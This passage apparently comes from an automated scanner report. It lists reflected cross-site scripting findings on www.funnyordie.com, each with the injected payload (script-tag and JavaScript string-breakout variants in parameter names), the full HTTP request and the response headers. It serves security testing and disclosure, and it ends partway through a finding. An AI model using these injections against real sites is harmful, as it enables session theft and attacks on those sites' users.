1.64. http://www.funnyordie.com/oembed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/oembed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d628"><script>alert(1)</script>0fd5b641e76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /oembed?3d628"><script>alert(1)</script>0fd5b641e76=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Server: nginx Content-Type: text/html; charset=utf-8 Status: 500 Internal Server Error X-Varnish: 1401113908 Content-Length: 53757 X-Varnish: 573890015 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/(null) Expires: Fri, 05 Nov 2010 04:59:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:12 GMT Connection: close
1.65. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58692"><script>alert(1)</script>baa790cc643 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /promos/widgethq?58692"><script>alert(1)</script>baa790cc643=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "209d96b4c98751bdc5eb91349729c20d" X-Runtime: 124 X-Varnish: 1401126424 X-Varnish: 1264360005 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:11:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:11:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 82221
1.66. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a955'-alert(1)-'af71981e5b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /promos/widgethq?3a955'-alert(1)-'af71981e5b6=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "d0d7cbf45aa1484511d91ffd6b459337" X-Runtime: 125 X-Varnish: 1401127234 X-Varnish: 573906184 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:12:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:12:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 81848
1.67. http://www.funnyordie.com/promos/widgethq [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/promos/widgethq
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd84e"-alert(1)-"5b039ab1e13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /promos/widgethq?dd84e"-alert(1)-"5b039ab1e13=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "95a1a70ab696a83ed5397d30fd0fab10" X-Runtime: 141 X-Varnish: 1401126825 X-Varnish: 1264360428 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:12:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:12:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 81905
1.68. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a57"><script>alert(1)</script>e7bcd741c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a?b5a57"><script>alert(1)</script>e7bcd741c1e=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "10624fc9c561b43e32ef3addf1ca1de0" X-Runtime: 121 X-Varnish: 1401143779 X-Varnish: 573927064 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:30:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:30:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168489
1.69. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bbfc'-alert(1)-'224a1fbb6a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a?5bbfc'-alert(1)-'224a1fbb6a5=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "cb6838f9ef66bde08aa1abd77bbe5e29" X-Runtime: 373 X-Varnish: 1401144922 X-Varnish: 1264381979 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:31:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:31:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 167950
1.70. http://www.funnyordie.com/search/a [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722e4"-alert(1)-"4dc3116555d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a?722e4"-alert(1)-"4dc3116555d=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "09dcc9a8c93e954af6e24b47a93fbd7a" X-Runtime: 474 X-Varnish: 1401144256 X-Varnish: 573927530 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:30:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:30:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168008
1.71. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da8a4"><script>alert(1)</script>c8aa137f65c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a/images?da8a4"><script>alert(1)</script>c8aa137f65c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "9e0f168b52267c869dcb3a52e048e3e1" X-Runtime: 96 X-Varnish: 1401145415 X-Varnish: 1264382569 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:32:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:32:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168604
1.72. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7024a"-alert(1)-"57c333d0375 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/images?7024a"-alert(1)-"57c333d0375=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "cb356b6a7d039d06f032428c7fbf4fa0" X-Runtime: 479 X-Varnish: 1401145972 X-Varnish: 573929667 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:32:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:32:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168077
1.73. http://www.funnyordie.com/search/a/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca3c'-alert(1)-'42d49773b20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/images?aca3c'-alert(1)-'42d49773b20=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "4a0ba34ac3695abdf11cb1198bbf014e" X-Runtime: 109 X-Varnish: 1401146440 X-Varnish: 573930185 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:33:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:33:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168055
1.74. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a907"-alert(1)-"aabb18c5a0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/users?6a907"-alert(1)-"aabb18c5a0e=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "18dc784d47949ba7b98714afaed548a0" X-Runtime: 107 X-Varnish: 1401145352 X-Varnish: 573928841 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:32:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:32:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 167760
1.75. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6862f'-alert(1)-'91a5b631bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/a/users?6862f'-alert(1)-'91a5b631bfe=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "49f34edc1333c0e32f7d3def3ac47a52" X-Runtime: 116 X-Varnish: 1401146061 X-Varnish: 573929771 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:32:49 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:32:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 167727
1.76. http://www.funnyordie.com/search/a/users [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/search/a/users
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c47"><script>alert(1)</script>2e144e902db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/a/users?e4c47"><script>alert(1)</script>2e144e902db=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "bd9b81d3cfa909c49bcb27691c87a656" X-Runtime: 127 X-Varnish: 1401145058 X-Varnish: 1264382126 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:31:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:31:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 168211
1.77. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb53b'-alert(1)-'0578c16e051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /signup?bb53b'-alert(1)-'0578c16e051=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "6a25b378033ecfa1bd097aa462bfaf21" X-Runtime: 97 X-Varnish: 1401114402 X-Varnish: 573890704 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:59:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57008
1.78. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d885a"-alert(1)-"99624835e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /signup?d885a"-alert(1)-"99624835e69=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "e7da38757123bd7012cd9fb2883f5651" X-Runtime: 103 X-Varnish: 1401114158 X-Varnish: 573890366 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 04:59:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57015
1.79. http://www.funnyordie.com/signup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/signup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 183f4"><script>alert(1)</script>e305ed6d005 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /signup?183f4"><script>alert(1)</script>e305ed6d005=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "13b48654181646a347934b2b3ab2d8ec" X-Runtime: 106 X-Varnish: 1401113776 X-Varnish: 573889820 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 04:59:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 04:59:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57289
1.80. http://www.funnyordie.com/stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf610"><script>alert(1)</script>72f78a115ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss?bf610"><script>alert(1)</script>72f78a115ad=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "49f6a38b6264bf5d990f04ca3b4f7b87" X-Runtime: 161 X-Varnish: 1401143193 X-Varnish: 573926321 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:29:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:29:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 275292
1.81. http://www.funnyordie.com/stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d31a"-alert(1)-"d086f01b0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/2513d56ca5/nfl-week-8-recap-we-all-want-to-be-randy-moss?1d31a"-alert(1)-"d086f01b0cf=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "3a5ca89b62ab63dda0acc1a5770b40f2" X-Runtime: 203 X-Varnish: 1401143986 X-Varnish: 573927253 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:30:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:30:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 275208
1.82. http://www.funnyordie.com/stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4799"><script>alert(1)</script>742941b328b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits?e4799"><script>alert(1)</script>742941b328b=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "9d5909b830811c7d31272abd6b53ba67" X-Runtime: 198 X-Varnish: 1401129951 X-Varnish: 573909644 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:15:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:15:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 274080
1.83. http://www.funnyordie.com/stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cd8"-alert(1)-"edd42e7282b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/37e04d17ad/louis-c-k-addresses-the-infamous-middle-finger-in-louie-s-opening-credits?c1cd8"-alert(1)-"edd42e7282b=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "2b68902c024267799e04c8794a3636ab" X-Runtime: 154 X-Varnish: 1401130195 X-Varnish: 573909986 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:15:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:15:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 274078
1.84. http://www.funnyordie.com/stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c73"-alert(1)-"d90cbceef26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear?76c73"-alert(1)-"d90cbceef26=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "f2561b82010cec183029e756a9f8b798" X-Runtime: 240 X-Varnish: 1401143174 X-Varnish: 573926296 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:29:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:29:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 313661
1.85. http://www.funnyordie.com/stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ddb"><script>alert(1)</script>6e870b6d70c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /stories/4e561641f4/the-funniest-signs-from-the-rally-to-restore-sanity-and-or-fear?36ddb"><script>alert(1)</script>6e870b6d70c=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "ce7ad0426103f33518f1e64cb0480b54" X-Runtime: 552 X-Varnish: 1401142331 X-Varnish: 1264379085 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:28:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:28:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 313739
1.86. http://www.funnyordie.com/stories/8d571e73b1/snoop-dogg-vs-robocop-kid-the-two-best-halloween-costumes [name of an arbitrarily supplied request parameter]previousnext
